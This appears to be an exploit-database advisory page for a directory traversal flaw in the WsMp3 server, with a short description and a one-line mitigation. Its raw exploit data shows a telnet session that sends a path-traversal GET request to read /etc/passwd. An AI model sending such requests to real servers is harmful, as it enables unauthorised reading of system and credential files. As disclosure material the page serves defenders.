header-logo
Suggest Exploit
vendor:
WsMp3
by:
SecurityFocus
7.5
CVSS
HIGH
Insufficient Sanitization of HTTP GET Requests
20
CWE
Product Name: WsMp3
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2002

WsMp3 Insufficient Sanitization of HTTP GET Requests

A vulnerability has been reported in WsMp3. The problem occurs due to insufficient sanitization of HTTP GET requests. As a result, an attacker may be capable of accessing the contents of sensitive system resources. Information obtained through the exploitation of this issue may aid an attacker in launching further attacks against a target system.

Mitigation:

Ensure that all user-supplied input is properly sanitized before being used in HTTP GET requests.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/7642/info


A vulnerability has been reported in WsMp3. The problem occurs due to insufficient sanitization of HTTP GET requests. As a result, an attacker may be capable of accessing the contents of sensitive system resources. Information obtained through the exploitation of this issue may aid an attacker in launching further attacks against a target system.

bash$ telnet wsmp3.server.com 8000
Trying 61.37.xxx.xx...
Connected to 61.37.xxx.xx.
Escape character is '^]'.
GET /dir/../../../../../../etc/passwd HTTP/1.0